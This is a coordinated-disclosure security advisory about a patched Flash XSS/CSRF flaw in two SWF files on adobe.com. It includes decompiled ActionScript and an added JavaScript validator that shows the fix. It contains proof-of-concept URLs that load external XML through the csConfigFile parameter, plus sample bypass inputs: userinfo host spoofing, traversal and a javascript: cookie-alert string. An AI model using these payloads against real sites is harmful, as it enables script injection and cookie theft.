Document Title:
===============
Adobe - CS Flash Cross Site Vulnerability & Filter Bypass

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1022

Release Date:
=============
2013-09-25

Vulnerability Laboratory ID (VL-ID):
====================================
1022

Common Vulnerability Scoring System:
====================================
2.1

Product & Service Introduction:
===============================
Adobe Systems, Inc. is an American multinational computer software company headquartered in San Jose, California, United States. The company has historically focused upon the creation of multimedia and creativity software products, with a more recent foray towards rich Internet application software development. Adobe was founded in December 1982 by John Warnock and Charles Geschke, who established the company after leaving Xerox PARC in order to develop and sell the PostScript page description language. In 1985, Apple Computer licensed PostScript for use in its LaserWriter printers, which helped spark the desktop publishing revolution. The company name Adobe comes from Adobe Creek in Los Altos, California, which ran behind the houses of both of the company's founders. Adobe acquired its former competitor, Macromedia, in December 2005, which added newer software products and platforms such as ColdFusion, Dreamweaver, Flash and Flex to its product portfolio. As of 2010, Adobe Systems has 9,117 employees, about 40% of whom work in San Jose. Adobe also has major development operations in Orlando; Seattle; San Francisco; Lehi, Utah; Minneapolis; Waltham, Massachusetts; and San Luis Obispo, California in the United States; Ottawa, Canada; Hamburg, Germany; Noida and Bangalore, India; Bucharest, Romania; Basel, Switzerland; and Beijing, China.
(Copy of the vendor Homepage: http://www.adobe.com)

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a remote client-side vulnerability in a Flash component of the official Adobe Systems website application.

Vulnerability Disclosure Timeline:
==================================
2013-07-17: Researcher Notification & Coordination (Ateeq Khan)
2013-07-18: Vendor Notification (Adobe - Security Team)
2013-08-13: Vendor Response/Feedback (Adobe Security Team)
2013-09-24: Vendor Fix/Patch (Adobe Developer Team)
2013-09-26: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Adobe Systems
Product: Online Service - Web Application 2013 Q2

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Low

Technical Details & Description:
================================
A Vulnerability Laboratory researcher discovered a flaw in a Flash component that is active on the main website of Adobe Systems (www.adobe.com). The affected component lets a remote attacker make it include XML files from external, non-validated websites, resulting in HTML injection and cross-site scripting (XSS). Attackers can execute malicious non-persistent script code on the client side; at least two different .swf files affected by this vulnerability have been identified.

Depending on the Flash Player version, the reported issue manifests as cross-site scripting or as cross-site request forgery. In Flash Player versions 8 and below, the use of a globally undefined variable in any function that makes a web request results in a cross-site scripting vulnerability; in Flash Player version 9 and above Adobe has partially mitigated this, so the remaining issue is a cross-site request forgery vulnerability.
Given that the user's Flash Player is version 9 or above, the end user may be subject to a cross-site request forgery attack. Cross-site request forgery allows an attacker to create an unauthorized web request to a sensitive resource on the user's behalf. The recommended mitigation for this type of attack is to initialize all global variables in the Flash application; if FlashVars need to be used, proper input validation should be performed.

The affected path is `/enterprise/partners/sap_tour/Misc/` and the affected parameter is `csConfigFile`. Normally the component loads an XML config file from its own host; because the `csConfigFile=` parameter is not validated, it can be manipulated via the GET method to include a remote malicious .xml file of the attacker's choice. Once included, the client-side script code is executed in the Flash web application layout as a frame.

Given that the user's Flash Player is version 8 or below, a cross-site scripting attack may be executed instead. If successful, cross-site scripting vulnerabilities can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on end-user systems. The recommended mitigation is the same: initialize all global variables in the Flash application, and validate any FlashVars that must be used.

Vulnerable Path:
[+] http://www.adobe.com/enterprise/partners/sap_tour/Misc/

Vulnerable File(s):
[+] Improving_Customer_Service_controller.swf
[+] Customer_Cummunications_Management_controller.swf

Vulnerable Parameter(s):
[+] csConfigFile

Proof of Concept (PoC):
=======================
The client-side cross-site scripting vulnerability can be exploited by a remote attacker without authentication and with low or medium user interaction required. For demonstration or reproduce ...
POC Link #1:
http://www.adobe.com/enterprise/partners/sap_tour/Misc/Customer_Cummunications_Management_controller.swf?csConfigFile=http://www.evolution-sec.com/clients/flashjs/test.xml

POC Link #2:
http://www.adobe.com/enterprise/partners/sap_tour/Misc/Improving_Customer_Service_controller.swf?csConfigFile=http://www.evolution-sec.com/clients/flashjs/test.xml

Review: Source Code (decompiled ActionScript 2 from the affected SWF)

MovieClip 0 {
  // Frame 0
  // Action0
  {
    loadConfigFile = function () {
      ConfigData = new XML();
      ConfigData.onLoad = configFileLoaded;
      ConfigData.ignoreWhite = true;
      if (_root.csConfigFile == undefined) {
        // The default only applies when the FlashVar is absent; any value
        // supplied via ?csConfigFile=... on the SWF URL is taken as-is.
        _root.csConfigFile = "config.xml";
      }
      // Validation is not being performed before loading the config file!
      var __callResult_34 = ConfigData.load(_root.csConfigFile);
      CSData = new Object();
    }
  }
}

Solution - Fix & Patch:
=======================
Set appropriate allowScriptAccess and allowNetworking parameters within the HTML code.
Perform data validation on variables sent to URL functions to ensure only http:// and https:// protocols are allowed; validate that the URL is for an allowed domain, or use relative URLs.
Escape special characters placed within HTML text fields. Do not use HTML text fields unless HTML support is needed.
Compile the SWF for more recent Flash Player versions. Encourage users to have the latest version of Flash Player to view your content.

Security Risk:
==============
The security risk of the client-side cross-site web vulnerability is estimated as medium(-).

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq Khan (ateeq@evolution-sec.com) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose.
Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:  www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:  admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:  www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social:   twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:    vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by the Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material, contact admin@vulnerability-lab.com or research@vulnerability-lab.com to get permission.

Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
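The validation that the Solution section asks for on `csConfigFile`, as an added example that is not part of the advisory and is neither Adobe's code nor the decompiled SWF. It is written in JavaScript (runnable under Node) rather than ActionScript 2, because the check is a URL-resolution problem and the logic carries over unchanged; the allow-listed host (`www.adobe.com`), the application directory taken from the Vulnerable Path, and the sample values are assumptions made for the demonstration. It goes beyond the advisory's single PoC value to cover the usual ways a naive prefix or substring filter on such a parameter is bypassed: protocol-relative URLs, the trusted host name placed in the userinfo part, scheme and host case, directory traversal, and non-http schemes.

```javascript
// Added example for this advisory (not Adobe's code and not the decompiled
// SWF): the csConfigFile validation the Solution section asks for, in
// JavaScript rather than ActionScript 2 so it runs under Node. The allow-listed
// host, the application directory and the sample values are assumptions.

// Directory the affected SWFs are served from (the advisory's Vulnerable Path).
const APP_BASE = "http://www.adobe.com/enterprise/partners/sap_tour/Misc/";
const APP_DIR = new URL(APP_BASE).pathname;
// Assumption: the config may only be fetched from the application's own host.
const ALLOWED_HOSTS = new Set(["www.adobe.com"]);
// Default used by the decompiled loadConfigFile() when the FlashVar is unset.
const DEFAULT_CONFIG = "config.xml";

// Mirror of the decompiled logic: whatever arrives in csConfigFile is loaded.
function vulnerableConfigTarget(csConfigFile) {
  return csConfigFile === undefined ? DEFAULT_CONFIG : csConfigFile;
}

// Hardened replacement: the absolute URL to load, or null to refuse the load.
function safeConfigTarget(csConfigFile) {
  if (csConfigFile === undefined || csConfigFile === "") {
    return new URL(DEFAULT_CONFIG, APP_BASE).href;
  }
  // Control characters and backslashes never belong in a config path; the
  // WHATWG parser would otherwise treat "http:\\host" as an absolute URL.
  if (/[\u0000-\u001f\\]/.test(csConfigFile)) return null;
  let target;
  try {
    // A relative value resolves against the SWF's own directory; an absolute
    // value (http://..., //host/...) keeps its own origin and is checked below.
    target = new URL(csConfigFile, APP_BASE);
  } catch (e) {
    return null;
  }
  // Only http/https, as the advisory's fix recommends (no javascript:, data:, file:).
  if (target.protocol !== "http:" && target.protocol !== "https:") return null;
  // "http://www.adobe.com@evil.example/x.xml" carries the trusted name as userinfo.
  if (target.username !== "" || target.password !== "") return null;
  // The parser lower-cases the host, so "WWW.ADOBE.COM" compares equal.
  if (!ALLOWED_HOSTS.has(target.hostname)) return null;
  // Stay inside the application directory: "../../x.xml" resolves outside it.
  if (!target.pathname.startsWith(APP_DIR)) return null;
  if (!target.pathname.endsWith(".xml")) return null;
  return target.href;
}

// Read csConfigFile the way it reaches the SWF: from the query string on the
// .swf URL, which the plug-in exposes as a FlashVar on _root.
function configTargetForSwfUrl(swfUrl) {
  const value = new URL(swfUrl).searchParams.get("csConfigFile");
  return safeConfigTarget(value === null ? undefined : value);
}

// Constructed sample values: the advisory's PoC value plus common bypass attempts.
const SAMPLE_VALUES = [
  undefined,                                                   // FlashVar absent
  "config.xml",                                                // the intended value
  "http://www.evolution-sec.com/clients/flashjs/test.xml",     // the advisory's PoC value
  "//www.evolution-sec.com/clients/flashjs/test.xml",          // protocol-relative
  "http://www.adobe.com@www.evolution-sec.com/test.xml",       // trusted host as userinfo
  "HTTP://WWW.ADOBE.COM/enterprise/partners/sap_tour/Misc/tour.xml", // case only
  "../../../../other/config.xml",                              // leaves the directory
  "javascript:alert(document.cookie)",                         // non-http scheme
];

// Verdict table for the samples; returned rather than only printed so it can be checked.
function classifySamples() {
  return SAMPLE_VALUES.map((v) => ({
    value: v,
    vulnerable: vulnerableConfigTarget(v),
    safe: safeConfigTarget(v),
  }));
}

for (const row of classifySamples()) {
  console.log(`${String(row.value).padEnd(66)} vulnerable -> ${row.vulnerable}`);
  console.log(`${"".padEnd(66)} safe       -> ${row.safe}`);
}
```

Run it with `node` to print both verdicts for each sample. `vulnerableConfigTarget` corresponds to the decompiled `loadConfigFile`, which hands `_root.csConfigFile` straight to `ConfigData.load`; `safeConfigTarget` is the check that argument should pass through before any request is made. Resolving the value against the SWF's own directory and then comparing the parsed scheme, userinfo, host and path, rather than pattern-matching the raw string, is what defeats the bypasses in the sample list: the WHATWG parser normalises case and `..` segments for you, and `//host/` and `user@host` forms are caught because the decision is made on the parsed origin, not on what the string begins with.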